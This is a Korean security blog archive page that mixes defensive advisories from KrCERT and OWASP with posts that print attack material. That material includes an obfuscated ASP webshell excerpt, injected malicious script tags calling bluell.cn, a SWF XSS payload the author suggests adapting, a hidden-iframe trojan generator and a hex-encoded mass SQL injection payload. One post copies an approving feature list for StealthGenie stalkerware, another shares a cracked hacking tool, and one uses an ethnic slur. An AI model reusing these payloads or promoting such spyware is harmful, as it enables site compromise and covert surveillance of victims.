Search Results for '해킹&보안/보안 뉴스'


36 posts related to '해킹&보안/보안 뉴스'

  1. 2017/03/22 아직도 스마트폰 도청 위치추적 APP 이 있습니다.
  2. 2012/07/20 주요 웹 취약점 TOP 10
  3. 2011/09/07 암호 알고리즘 및 키길이 이용 안내서
  4. 2011/03/20 웹으로 바이러스 검사하자!!! 온라인 v3 입니다. 1
  5. 2010/06/07 웹해킹 방어를 위한 KrCERT/CC권고사항 |
  6. 2010/03/12 SQL 인젝션 해킹 주의요망 - 정보
  7. 2009/08/27 ‘About Windows Security’ 카테고리에 등록된 글 모두 보기
  8. 2009/08/25 cer 확장자로 위장한 웹쉘 백신 검사.. 전체공개
  9. 2009/08/25 사이트에 악성코드가 있는지 알아볼수 있는 Proxy - SpyBye
  10. 2009/08/25 악성코드 bluell.cn 의 ip.js
  11. 2009/08/25 Microsoft XML Core Services 4.0 서비스 팩 2용 보안 업데이트 반복 설치 문제
  12. 2009/08/24 웹보안 강화도구 안내
  13. 2009/08/24 SQL Injection공격으로 인한 악성코드 삽입피해 주의요망
  14. 2009/08/17 웹사이트 88% 보안에 취약
  15. 2009/08/11 SWF XSS PoC
  16. 2009/08/11 중국 최고의 해킹 툴 류광 5.0 3
  17. 2009/08/11 보안 진단툴인가 해킹 툴인가
  18. 2009/08/11 웹 트로이목마 생성기
  19. 2009/08/11 Windows 2008 서버의 새로운 기능(Hyper-V)
  20. 2009/08/11 Mass Exploits with SQL Injection
  21. 2009/08/11 [툴 소개] Trend Micro RUbotted
  22. 2009/08/11 천당2기술
  23. 2009/08/11 무자헤딘 비밀(Mujahedeen Secret)
  24. 2009/08/11 패스워드 없이 Lock 된 Windows XP Unlock
  25. 2009/08/11 Social Engineering Hacking - Humans get Hacked
  26. 2009/08/11 신종 DoS 공격 - SQL 와일드카드 공격
  27. 2009/08/11 Shockwave Exploit
  28. 2009/08/11 DB 취약점 스캐너
  29. 2009/08/11 DDoS 공격 툴 NetBot Attacker
  30. 2009/08/11 웹기반의 DDoS botnet, BlackEnergy

스마트폰 처음 구입 후 이런 저런 프로그램 을 개발 하면서 스마트폰 위치추적이 너무 쉽게 이루어 지는걸 보고 이후 파장이 염려 되었습니다.

 

2010년도 개발한 스마트폰 위치 추적이 지금도 되는걸 보고 구글에서는 뭘 하는지. ?

 

오늘 SPYCELLPHONE 사이트에 접속 하였습니다. 이렇게 공지가 뜨네요

 

 

내용을 한국어로 번역하면 나오는 내용입니다.

 

 

더 이상 법적인 문제로 일시적으로 폐쇄 되었다 합니다.

 

사이트를 이리저리 보던 중

 

 

이런 사진이 있네요 . 카카오톡 스파이가 가능하다는 내용과 함께. 자세히 다른 내용을 들여다 보니 아직도 가능 하다는 내용입니다.

 

기존 내용 입니다.

기능 긁어 와서 붙여 넣기 하겠습니다.

 

기본

StealthGenie 다른 모바일 스파이 소프트웨어가 제공하는 기본적인 기능과 더불어 몇몇 실용적인 추가 기능을 제공합니다. '베이직' 월간 플랜으로 통화 내역 모니터링, 주고 받은 SMS 메시지 모두 읽기, 연락처와 북마크, 약속과 달력 정보 보기 등이 가능합니다. StealthGenie 베이직은 또한 실시간 GPS 감시와 위치 히스토리 기능을 제공합니다

많은 사람들에게, 기능으로 충분할 것입니다. StealthGenie 베이직은 기능들을 훌륭하게 수행하며예를 들어 자녀들의 행방을 대략적으로 지펴 보기만을 원하는 이들에게는 아마도 기능들이 스파이 전화기 앱에서 필요한 전부일 것입니다. 고급 기능을 사용할 시간이나 의향이 없다면, StealthGenie 베이직은 낮은 서비스 가격으로 모든 일반적인 기능을 수행합니다.

고급 기능

그러나, 제품을 오늘날 시중에 나와있는 모바일 스파이 중에서 유일무이한 것으로 만드는 것은 StealthGenie 고급 기능입니다. 혁신적인 것들은 매달 단지 몇달러의 추가 비용밖에 들지 않는 StealthGenie '골드' 패지키와 함께 제공됩니다.

가상 경계 설정

회사가 개발한 멋진 기능 하나는 '가상 경계 설정' 기능입니다. 가상 경계 설정을 사용해서 여러분은 대상 전화기와 전화기의 사용자가 여러분이 안전하다고 지정한 지역을 떠나거나 위험 또는 금지된 것으로 여겼던 지역에 들어가는 때를 알려주는 '안전' 지역과 '제한' 지역 경계경보를 설정할 있습니다. 구역들은 개인 계정의 제어판에 있는 지도 디스플레이를 사용해서 쉽게 지정할 있습니다 기능은 특히 자녀들의 행방과 이동을 추적하기 위해 모바일 스파이웨어 구입에 관심을 가지는 부모들에게 유용합니다. 안전 구역으로, 여러분은 여러분의 십대가 학교에서 일찍 나왔는지 또는 공부를 해야 하는 시간에 집에서 벗어나 있는지를 있습니다. 제한 구역은 대상 전화기가 전화기 사용자에게 출입금지인 지역에 들어서는지를 알려 줍니다

메신저, Viber 스카이프 추적 관찰

StealthGenie 골드를 사용하면 스카이프 통화, 메시지와 연락처 아니라 WhatsApp iMessage 채팅, Viber 통화와 메시지에도 접속할 있습니다.

이메일 추적 관찰  

StealthGenie 골드를 사용하면, 사용자는 Gmail 접속해서 주고 받은 이메일을 읽을 있습니다많은 스파이 앱은 전화기의 이메일 기능에만 접근할 있을 , Gmail 계정 접근이 가능하지 않습니다이것은 어떤 이들이 아주 유용하게 생각할 있는 기능 하나입니다.

주변 소리 녹음

기능으로 대상 전화기의 주변 소리를 듣고 녹음할 있습니다. 기능은 전화기를 대화나 전화기의 인근에서 발생하는 다른 활동을 듣는 도청 장치로 사용할 있게 해줍니다. 많은 사람들이 이것을 상당히 매력적인 기능으로 보고 있으며 현재 대부분의 훌륭한 스파이 앱은 자신들의 패키지에서 기능을 제공하고 있습니다

멀티미디어 접금

StealthGenie 골드를 사용하면, 사진과 동영상을 있으며 전화기에 저장된 음악 파일도 들을 있습니다.

 

즉각적인 경계경보

StealthGenie 흥미로운 기능 하나는 사용자가 '의심스러운' 단어와 전화번호를 지정할 있는 기능입니다. 특정한 단어나 단어 세트가 대상 전화기에 입력이 되면, 여러분은 즉각적인 경계경보를 받게 됩니다. 전화번호에 대해서도 동일합니다. 여러분은 이메일 /또는 SMS 통해 즉각적인 통지를 받게 됩니다. 제가 알고있는 , 시점에서StealthGenie 기능을 제공하는 유일한 회사이며 기능은 분명히 어떤 상황에서 유용한 것입니다.

 

StealthGenie 아이폰, 안드로이드와 블랙베리 iOS 또는 OS 장착된 전화기와 태블릿에 작동합니다. Symbian 윈도우 사용자에게는 유감스럽지만, 시점에서 StealthGenie 해당 기기를 제공하지 않습니다.

 

StealthGenie 광고하는 그대로 작동하는 훌륭한 기능을 많이 갖추고 있는 설계되고 사용자 친화적인 스파이 전화기 앱입니다. 저는 기능 어느 것에서도 문제를 발견할 없었으며 모든 기능이 이해하고 사용하기에 아주 쉬웠습니다

제어판은 간단하며 전혀 기술적이지 않은 타입의 사람들이라고 하더라도 제어와 설정을 통해 상당히 빨리 다룰 있게 것입니다. 데모 페이지는StealthGenie 무엇이며 어떻게 사용하는지에 대한 감을 익히려는 신규 사용자에게 확실히 추천할만한 것입니다.

StealthGenie 주위에서 가장 저렴한 옵션은 아니지만, 패키지에서 제공하는 기능을 고려해볼 가격은 충분히 경쟁적이며  회사에 대한 평판도 좋습니다. 회사는이제 오래 전부터 사업에 종사해왔고 자사 제품의 기능을 혁신적이고 유용한 방식으로 계속 발전시키고 있습니다.

 

결론 :

 

지금도 넷버스 트로이 목마가 존재 합니다. (백신에 걸려서 사용못한다고 ?)

오픈소스가 많아서 일부 소스를 수정하면 아직도 백신에 걸리지 않고 PC 장악 있습니다.

스마트 폰이라고 이런 트로이목마 를 근본적으로 사용할수 없도록 할수 있는 방법이 없네요. 그나마 애플이 이런 면에서는 한수 위라고 생각합니다.

 




2017/03/22 18:51 2017/03/22 18:51
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards


2012/07/20 21:19 2012/07/20 21:19
본 안내서는 SEED, HAS-160, KCDSA 등 국산 알고리즘을 포함해 보안강도에 따라 선택 가능한 암호

알고리즘의 종류와 키 길이, 유효기간을 소개한다.




2011/09/07 19:33 2011/09/07 19:33

1. http://v3.nonghyup.com/
농협에서 제공하는 v3

2. http://www.viruschaser.com/Kor/vc4wo/bestez_2/frame.jsp
바이러스체이서 온라인 스캐너

3. http://www.eset.eu/eset-online-scanner-run?i_agree=
eset-online-scanner

4. http://fx.hauri.net/HProduct/livesuite/shinhancard/CLIENT/LiveSuite/livecall/kor/livecall_vr.html
바이로봇(하우리)

5. http://www.gjcity.net/htm/guidance/virus_cure2.jsp
pc지기

6. http://www.f-secure.com/en_EMEA-Labs/security-threats/tools/online-scanner
f-secure 온라인 스캐너

7. http://www.virustotal.com/index.html
의심가는 진단 파일 여러 다른 백신으로 검사해보기

8. http://www.boho.or.kr/pccheck/pcch_01.jsp?page_id=1
보호나라(여러가지 온라인 백신 링크)




2011/03/20 03:03 2011/03/20 03:03

< 웹해킹 방어를 위한 KrCERT/CC 권고 사항>

※ 공개웹방화벽 전용 홈페이지 안내(방화벽 설치 시 주요 웹해킹 방어가능)

o 공개웹방화벽(WebKnight 및 ModSecurity) 다운로드, 설치 운영 가이드, FAQ 등의 정보 제공
   - http://www.krcert.or.kr/firewall/index.htm

※ 무료 웹취약점 점검을 신청(웹취약점 탐지 및 해결방법을 설명)

o 무료 홈페이지 취약점 점검서비스 신청하러가기
   - http://webcheck.krcert.or.kr 

※ 아래의 문서를 참조하여 해킹에 대응하시기 바랍니다.

o 홈페이지 개발 보안 가이드
   - http://www.kisa.or.kr/trace_log/homepage_guide_down.jsp 

o 웹 어플리케이션 보안 템플릿 
   - http://www.krcert.or.kr/docDown.jsp?dn=3 

o 침해사고 분석절차 가이드 
   - http://www.krcert.or.kr/docDown.jsp?dn=10 

o PHP웹 게시판 취약점 관련 사고분석 및 보안대책 
   - http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2005001.pdf&docNo=IN2005001 

o SQL Injection 취약점을 이용한 윈도우즈 웹서버 사고 사례 
   - http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2005014.pdf&docNo=IN2005014  

o 웹 해킹을 통한 악성 코드 유포 사이트 사고 사례 
   - http://www.krcert.or.kr/unimDocsDownload.do?fileName1=050629-IN-2005-012.pdf&docNo=IN2005012 

o ARP Spoofing 기법을 이용한 웹 페이지 악성코드 삽입 사례 
   - http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2007003.pdf&docNo=IN2007003&docKind=3 

궁금하신점은 국번없이 118(한국정보보호진흥원)으로 연락바랍니다.




2010/06/07 17:06 2010/06/07 17:06

[SQL 인젝션 해킹 주의요망]

1. 해킹

최근 국내 및 전세계적으로 SQL 인젝션등 잇다른 해킹사고가 발생하고 있습니다.


2. 점검방법

1) KISA는 홈페이지 주요 취약성을 파악하는 보안성 강화도구 캐슬(CASTLE)과
웹 서버에 숨겨진 웹셀을 탐지해 관리자에게 통지하는 휘슬(WHISTL)을 보급하고 있기 때문에 이를 이용하는 것도 좋은 방법”
다운로드 : 캐슬,휘슬 http://www.krcert.or.kr/index.jsp 오른쪽 아래
 
2) 웹취약점 점검서비스 :
   중소기업 , 비영리 단체 무료점검신청 http://toolbox.krcert.or.kr/




2010/03/12 15:35 2010/03/12 15:35

지난 2008년 10월 3일, 이름만 들어도 제 몸을 흠칫! 하게 만드는 Cain(풀네임은 Cain & Abel)이 4.9.23 버전으로 업데이트 된 바 있습니다.

사용자 삽입 이미지
 

# 왠지 그림 마저 무섭다…ㅎㄷㄷ

사실 Cain은 ARP Spoofing을 비롯한 네트워크 유해 현상을 발생시키기 위해 제작된 프로그램이 아닙니다. 다만 그 기능이 너무 출중하다보니 네트워크 해킹 툴로 쓰이는 불명예를 얻게 되었을 뿐이죠. Cain 프로그램에 대한 개요나 릴리즈노트 등은 아래 공식 웹사이트를 통해 좀 더 정확하게 확인하실 수 있을 겁니다. 시간 나실 때 한 번 방문해 보세요.

http://www.oxid.it

아무튼 새로운 버전이 나왔으니 얼마나 달라졌을까 궁금했을터! 그래서일까? 아니면 우연의 일치일까? 정확한 진의는 알 수 없지만, 아무튼 최근 들어 간헐적으로 ARP Spoofing이 발생하고 있습니다. 물론 경유지 서버에서 검출되는 Cain은 4.9.23 버전. 범인의 국적은 10명의 10명 모두 역시나 짱깨들이죠

문뜩 처음 Cain을 접했을 때가 생각납니다. 저는 이 악마 같은 프로그램을 보며 '대… 대박인데?' 를 입에서 떼어 놓질 못했지요. 거기다 프리웨어라니… 사용자가 품고 있는 사용 목적에 따라 사탄의 종자가 될 수도 있고, 눈부신 천사가 될 수도 있는 Cain! 그건 아마 스니퍼(Sniffer)가 갖고 있는 그것(양날의 칼 정도…)과 같을 겁니다.

각설하고!

누군가 서버에 프로그램을 설치했다는 것은 원격데스크탑을 통해 서버에 접속했다는 뜻입니다. 그리고 대부분 이 해킹 수법의 시작이 SQL 인젝션이라는 것! 많은 분들이 알고 계신 사실 중에 하나죠.

SQL 인젝션을 통해 서버의 최상위 권한이 탈취 되었다는 것은 MSSQL의 SA 계정을 웹소스에 직접 적용하여 사용하고 있다는 일종의 간접적인 예입니다. 병적으로 SA 계정을 싫어하는 저는 SA 계정을 웹소스에 적용하여 사용하는 일부 웹프로그래머들의 작태가 이해 되지 않습니다. 관리용 목적으로 생성되는 계정을 웹 서버와 DB 서버 간의 통신에 이용하다니… SQL 인젝션이 발생하면 아무 제한 사항 없이 해커에게 SA 계정을 사사해 주는 격이 되어 버리는데 '제발 좀 뚫어주세요~' 이것과 차이점이 없습니다. MSSQL 로그인 계정을 생성해서 데이터베이스와 매핑하는 일이 어려운 작업도 아니고 마우스 클릭 몇 번만 하면 손 쉽게 처리할 수 있는 부분인데 왜 굳이 SA 계정을 사용해야만 하는 것인지…

지금이라도 늦지 않았으니 웹 서버와 DB 서버 간의 통신에 SA 계정을 사용하고 계시다면 빠른 시일 내에 MSSQL 로그인 계정으로 수정하시길 간곡히 부탁 드립니다. ARP Spoofing이라는 거 내 서버에만 문제 생기는 게 아닙니다. 같은 세그먼트에 묶여 있는 죄 없는 다른 서버들에게도 같이 피해를 주는 것입니다.




2009/08/27 11:08 2009/08/27 11:08

IIS 웹 서버의 asp.dll 파일에 맵핑되어 있는 cer 확장자로 위장된 웹쉘이 발견되었습니다. 이 웹쉘은 ASP木2006 툴로 제작된 것으로 바이러스토탈 사이트에서 검사 결과, 우회코드로 인하여 일부 백신에서만 탐지하는 것으로 확인되었습니다.

--- top.cer 웹 쉘 일부 내용 ( 우회코드 ) -----

 Const m = "xl"
 Const showLogin = "xl"
 Const clientPassword = "#"
 Const dbSelectNumber = 10
 Const isDebugMode = False
 Const myName = "??去了"
 Const notdownloadsExists = False
 Const userPassword = "xiaonong"
 Const MyCmdDoTExeFiLe = "cOmmaNd.coM"
 ConSt strJSCloSeMe = "<inPut tYpe=butTon vAluE=' ?? ' onClick='wiNdow.cloSe();'>"

 Sub creAteIT(fSoX, SaX, wSX)
  If isDebugMode = False Then
   On Error Resume Next
  End If

  Set fsoX = Server.CreateObject("Scripting.FileSy"&x&"stemObject")
  If IsEmpty(fsoX) And (pagename = "FsoFile"&x&"Explorer" Or theAct = "fsoSe"&x&"arch") Then
   Set fsoX = fso
  End If

  Set saX = Server.CreateObject("Shell.Ap"&x&"plication")
  If IsEmpty(saX) And (pagename = "AppFileExplorer" Or pagename = "Sa"&x&"CmdRun" Or theAct = "saSe"&x&"arch") Then
   Set saX = sa
  End If

  Set wsX = Server.CreateObject("WScrip"&x&"t.Shell")
  If IsEmpty(wsX) And (pagename = "WsCm"&x&"dRun" Or theAct = "getTermina"&x&"lInfo" Or theAct = "readR"&x&"eg") Then
   Set wsX = ws
  End If

  If Err Then
   Err.Clear
  End If
 End Sub

----------------------

카스퍼스카이가 못 잡다니..... 예상 밖이네요..

사용자 삽입 이미지





2009/08/25 14:39 2009/08/25 14:39
http://swbae.egloos.com/1752527 헐랭이님 포스트 보니깐,. 음...

직접 해보니 나름 괜찮아 보이긴 한데,. 한가지 아쉬운 점은 url 을 직접 쳐 넣어야 한다는 점... -_-;;



사용법은,. 댓글에도 있지만,. 웹브라우져를 SypBye 서버를 Proxy 로 지정하면,.
사이트 접속시 해당 사이트의 분석을 해줍니다.



손이 좀 가지만,... 사이트 운영자라면,.
자신의 사이트에 대해서 한번 해보는 것도 좋을것 같습니다.^^;

출처 : http://www.wssplex.net/TipnTech.aspx?Seq=443



2009/08/25 14:10 2009/08/25 14:10
직간접적으로 운영되는 서버의 사이트중 하나에 다음 Sql Injection 코드가 삽입 되었습니다.. 최근에 삽입되는 종류가 매우 다양 하군요.. -_-;;

<script src=hxxp://bbs.juedui<script src=hxxp://www.bluell.cn/ip.js></script>
<script src=hxxp://www.bluell.cn/ip.js></script>
<script src=hxxp:/<script src=hxxp://www.bluell.cn/ip.js></script>

직접 위 주소의 ip.js 파일을 다운로드 해볼려니 삭제된 것 같습니다.

구글링 결과 354개.

http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=bluell.cn%2Fip.js&btnG=%EA%B2%80%EC%83%89&lr=lang_ko&aq=-1&oq=

위 코드중에 짤린 부분인,.
juedui.com 도 악성코드 위험 사이트 군요.

악성코드에 대한 보다 많은 정보는 다음 블로그 추천드립니다.
참고해 보세요.!! ^^;;

http://swbae.egloos.com/



2009/08/25 14:09 2009/08/25 14:09
시스템 파일 중 하나가 손상되었거나 제대로 업데이트되지 않은 경우 Microsoft Update 또는 Windows Update의 업데이트 목록에 이 보안 업데이트가 반복적으로 나타날 수 있습니다. 이 문제에 대한 자세한 내용은 다음 문서 번호를 클릭하여 Microsoft 기술 자료 문서를 참조하십시오.

http://support.microsoft.com/kb/941729/

Microsoft XML Core Services 4.0 서비스 팩 2용 보안 업데이트(KB936181)가 Microsoft Update 또는 Windows Update의 업데이트 목록에 반복적으로 나타날 수 있음 (영문)



2009/08/25 14:05 2009/08/25 14:05

저희 인터넷침해사고대응지원센터에서는 인터넷 홈페이지의 보안 수준을 강화할 수 있는 도구를 제작하여 배포하고 있습니다.


1. 웹쉘(페이지형태의 백도어) 탐지 도구 WHISTL


  • 도구 안내서 [다운로드]
  • WHISTL 신청서 및 다운로드 [바로가기]

    2. 웹보안 강화도구 CASTLE


  • 도구 안내서 [다운로드]
  • CASTLE 신청서 및 다운로드 [바로가기]

    출처 : 인터넷침해사고대응지원센터



  • 2009/08/24 11:16 2009/08/24 11:16

    SQL Injection공격으로 인한 홈페이지 내 악성코드 삽입피해 주의요망

    □ 개요
      o 최근 Windows 기반 웹사이트를 대상으로 SQL Injection 취약점을 공격하는
        해킹도구를 통해 데이터베이스내에 악성코드를 대량으로 삽입하는 사례가
        빈번히 발생하고 있어 홈페이지 관리자들의 각별한 주의가 요구됨
        ※ 해당 해킹도구는 일부 웹 보안 장비의 보안기능을 우회할 수도 있으므로
          주의가 필요

    □ 피해 현상
      o  홈페이지 초기화면에 정적(Static)으로 악성코드가 은닉되는 것이 아니라,
        데이터베이스 내 악성코드 링크를 삽입함으로써 해당 데이터베이스와 연동된
        게시판, 상품정보 등 웹 페이지에 악성코드가 동적(Dynamic)으로 삽입됨

     

    □ 원인 
      o  게시판이나 회원 인증 등 웹서비스와 데이터베이스가 연동되는 부분에서 전달
        되는 인자값에 대한 검증절차 부재로 인해 악의적인 SQL 명령어 주입이 가능
        하게 됨 (SQL Injection 취약점)
      o  특히, 최근에는 웹 사이트를 통해 유포되는 악성코드는 쿠키 등 HTTP 헤더정보
        를 통해서도 삽입되고 있고, 일부 웹 보안장비의 보안기능을 우회할 수도 있으
        므로 각별한 주의가 필요

       

    □ (피해 발생시) 복구방법
      o 데이터베이스 백업본 사용
        - 데이터베이스 백업본이 있을 경우 복구에 활용
      o 악성코드가 삽입된 테이블을 모두 찾아 SQL명령문으로 복구
       - 반드시 데이터베이스 관리자/개발자와 충분히 검토한 후에 적용 요망
       - 자료형 변환이 필요 없는 경우 replace함수만으로 복구 가능 

    Update [테이블명] set [컬럼명]=replace([컬럼명],[삭제하고자하는 악성코드 문자열],)

    예> Update freebbs set title=replace(title, ,)

       - 자료형 변환이 필요한 경우는 cast함수를 이용하여 복구

    Update [테이블명] Set [컬럼명] = replace(cast([컬럼명] as varchar(8000)), [삭제하고자하는 악성코드 문자열], )

    예> Update freebbs Set contents = replace(cast(contents as varchar(8000)), , )

           ※ 컬럼의 자료형(data type)이 ntext, image 등인 경우 cast함수를

             사용하여 자료형 변환 후 replace가능하지만, replace를 위한 변수

             공간(varchar(8000)) 보다 큰 자료의 경우 자료 손실이 발생 할 수

             있으므로 주의 요망. MS SQL 2005 이상에서는 varchar(max)사용 가능

       - MS SQL 서버에서 사용하는 큰값 자료형 참조 자료
        [1] 큰 값 자료형 설명:
                      http://msdn.microsoft.com/ko-kr/library/ms178158.aspx
        [2] UPDATETEXT 설명:
                      http://msdn.microsoft.com/ko-kr/library/ms189466.aspx

    □ 예방대책 
      o 근본적인 해결을 위해 모든 변수값에 유효값 검증 절차 적용
      o 웹사이트에서 사용하는 DB권한의 최소화 및 SA계정 사용 제한 등의
        SQL서버 최적화
      o 웹 보안 솔루션 도입 및 정책 최적화
       - MS URLscan 관련 자료
         [1] URLscan 사용방법: http://support.microsoft.com/kb/326444/ko
         [2] URLscan 다운로드: http://www.microsoft.com/downloads/details.aspx?FamilyId=EE41818F-3363-4E24-9940-321603531989&displaylang=en
          ※ URLscan은 웹방화벽과 유사하며 서버로 전달되는 값들의 필터링 기능이 지원됨
       - 공개웹방화벽 관련 자료
         [1] 사용자 커뮤니티:
                     www.securenet.or.kr > 열린지식 > 공개웹방화벽커뮤니티
       ※ WebKnight에서는 헤더설정의 Injection공격 차단이 설정되어 있어야 차단 가능하며,
           오탐발생이 예상되므로, 적용 후 일정기간 모니터링 필요

       

         

      o 웹사이트 보안 강화 가이드
       - 웹보안 4종 가이드: www.KrCERT.or.kr접속 > 웹보안 4종 가이드
      o 웹사이트 취약점 점검
       - KISA 무료 웹취약점점검 서비스 http://webcheck.krcert.or.kr
       ※ 비영리단체 또는 중소기업등의 정보보호취약계층만 서비스 대상임
       - MS 소스코드 검사 도구: http://support.microsoft.com/default.aspx/kb/954476
       - HP 점검 도구: http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx
      o  MS SQL서버에서 sysobjects 또는 syscolumns 권한을 제거하여 악성코드 삽입
         스크립트 실행을 차단할 수 있으나, 운영 환경에 따라 적용 효과에 차이가 있으므로
         추후에 배포될 기술문서에서 안내예정

    □ 참고사이트
      [1] http://isc.sans.org/diary.html?storyid=3823
      [2] http://isc.sans.org/diary.html?storyid=5092
      [3] http://www.modsecurity.org/blog/archives/2008/01/sql_injection_a.html
      [4] http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyId=16&articleId=9055858&intsrc=hm_topic
      [5] http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines
      [6] http://www.f-secure.com/weblog/archives/00001432.html 




    2009/08/24 10:21 2009/08/24 10:21
    글로벌 IT서비스업체 호스트웨이IDC는 자사 고객 웹사이트 100곳을 대상으로 웹 취약점 점검을 실시한 결과 88%가 보안 취약점을 갖고 있는 것으로 나타났다고 26일 밝혔다.

    '매우 위험', '위험', '취약', '안전' 등 4단계 기준으로 호스트웨이IDC가 웹 취약점을 자체분석한 결과 '매우 위험' 단계 웹사이트가 전체의 72%, '위험' 4%, '취약' 12% 등으로 집계됐다.

    호스트웨이IDC는 '매우 위험' 사이트 중 상당수에서 이미 개인정보가 유출됐을 가능성이 높다고 밝혔다.

    운영체제별로는 윈도 고객의 경우 '매우 위험' 단계가 79%로, 리눅스 또는 유닉스 고객의 60%에 비해 보안 취약점이 더 높은 것으로 나타났다.

    호스트웨이IDC는 이날 접수를 시작으로 선착순 100명의 고객에게 웹 취약점 분석 점검 및 리포트 2차 무료 프로모션을 실시한다. 자세한 내용은 홈페이지(www.hostway.co.kr)를 참고하면 된다.



    2009/08/17 16:43 2009/08/17 16:43
    중국 사이트에 보니 흥미로운 내용을 알게 되었다. 비밀은 xss.swf에 eval()가 실행시키는 코드가 있다는 것입니다.
    xss.swf 파일에는 다음과 같은 내용이 들어 있습니다. 이걸 잘 응용하면 아주 멋진 swf xss 공격 코드를 올려서 다양한 형태의 웹해킹이 가능할 겁니다. swf 디컴파일은 누구나 할 수 있으니..


    FWSS   x _    D   C?)   ?  javascript:alert('xss')  _self ? @  
    사용자 삽입 이미지



    2009/08/11 14:53 2009/08/11 14:53
    크랙을 했는데 프로그램에 치명적인 에러로 인해 Exception Handling Error가 발생해서 작동이 안되네요. 중국 최고의 해킹 툴 류광(일명 휘황찬란한 빛) 5.0 베타버전을 크랙해서 써보나 했는데.. 역시나 크랙이 불안하게 되었습니다. oxid의 cain과 쌍벽을 이루는 최고의 해커 만능 연장임을 감히 말할 수 있습니다. 특히 Pipecmd.exe, sqlrcmd.exe의 위력은 대단한 테크닉 기교입니다.
    특히 이번 버전은 이전에 보다 기능이 월등하 뛰어나서 기존에 취약점만 찾아주는 게 하니라 아예 해킹 exploit code를 구동시켜서 자동으로 해킹까지 해줍니다.  
    사용자 삽입 이미지

    자료를 첨부 할까 말까 고민하다가.
    첨부 합니다.
    그리고 해킹 툴이라서 백신에서 바이러스로 인식합니다 . 참고 하십시오.


    2009/08/11 14:45 2009/08/11 14:45
    류광으로 유명한 netXeyes에서 만든 상용제품으로 matrixay 라는 DB 보안진단툴입니다.
    사용자 삽입 이미지



    2009/08/11 14:40 2009/08/11 14:40

    요즘 유행하는 웹 트로이목마를 만드는 자바스크립트

    1. 아래와 같은 iframe에 있는 사이트의 test.html 파일에는 악의적인 js가 숨겨져 있다.

    <iframe src=http://www.test.com/test.html width=100 height=0 frameborder=0>

    2. 숨겨진 js에 들어 있는 내용
    document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
    document.writeln("<HTML><HEAD>");
    document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
    document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
    document.writeln("<BODY> ");
    document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.test.com\/\/z1.jpg\')\">");
    document.writeln("<DIV ");
    document.writeln("style=\"CURSOR: url(\'http:\/\/www.test.com\/\/z2.jpg\'
    \"><\/DIV><\/DIV><\/BODY><\/HTML>")

    3. test.js

    <script src="http://www.test.com/test.js"></script>




    2009/08/11 14:36 2009/08/11 14:36

    Windows 2008 서버에는 Hyper-V라는 새로운 기능이 추가되어 있다고 합니다.
    이 Hyper-V 는 한마디로 가상화 핵심기술이 다 녹아 들었습니다. 향후 가상화 기술이 보안기술의 핵심으로 등장할 전망입니다.

    MS와 VMware가 가상화로 일대 생존을 건 치열한 격전을 치르게 될 것은 분명하고요.
    일단 Hyper-V에서 지원되는 핵심기능을 살펴보면 입이 딱 벌어질 정도로 다음과 같습니다.

    1. 가상 랜(Virtual LAN) 지원
    2. 가상 머신을 위한 대용량 메모리 지원
    3. 동시에 32비트와 64비트 구동
    4. 각각의 가상 O/S(Guest OS라고 부르는 것 같음)마다 4CPU와 32GB 메모리 지원
    5. 가상 머신을 위한 원 프로세스 또는 다수 프로세스 지원
    6. Snapshot 기능 지원(VMware에서 가상 머신의 상태를 잠시 캡쳐해두고 멈추는 기능)
    7. 간편한 마이그레이션 지원(VMware의 VMotion 기능과 유사한 것)으로 셧다운 없이 하나의 가상머신에서 다른 머신으로 옮겨지는 기능 지원
    8. 가상 머신마다 네트워크 로드 발렌싱 기능 지원
    9. 마이크로소프트의 가상 머신 관리자(Microsfot Virtual Machine Manager)로 중앙에서 가상 머신을 관리할 수 있음




    2009/08/11 14:28 2009/08/11 14:28
    본 글은 isc.sans.org에 올라온 글을 참조해서 재구성한 것이다.
    다음 로그는 공격로그의 한 부분이다. 공격 로그 중 SQL 구문이 GET 부분에 들어가 있는 것을 볼 수 있다.

    GET /home/site_content_3.asp

    s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C00610072006500200040006D00200076006100720063006800610072002800380030003000300029003B00730065007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D007300650074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0027002000660072006F006D002000640062006F002E007300790073006F0062006A006500630074007300200061002C00640062006F002E0073007900730063006F006C0075006D006E007300200062002C00640062006F002E007300790073007400790070006500730020006300200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027005500270061006E006400200062002E00780074007900700065003D0063002E0078007400790070006500200061006E006400200063002E006E0061006D0065003D002700760061007200630068006100720027003B00730065007400200040006D003D005200450056004500520053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D005200450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B00%20AS%20NVARCHAR(4000));EXEC(@S);--


    위에서 보다시피 실제 구문은 인코딩되어 있어 금방은 알 수 없게 했다.
    공격자는 CAST 구분을 사용해서 공격을 쉽게 탐지하지 못하도록 혼란 공격(Obfuscate Attack) 기법을 사용하고 있다.
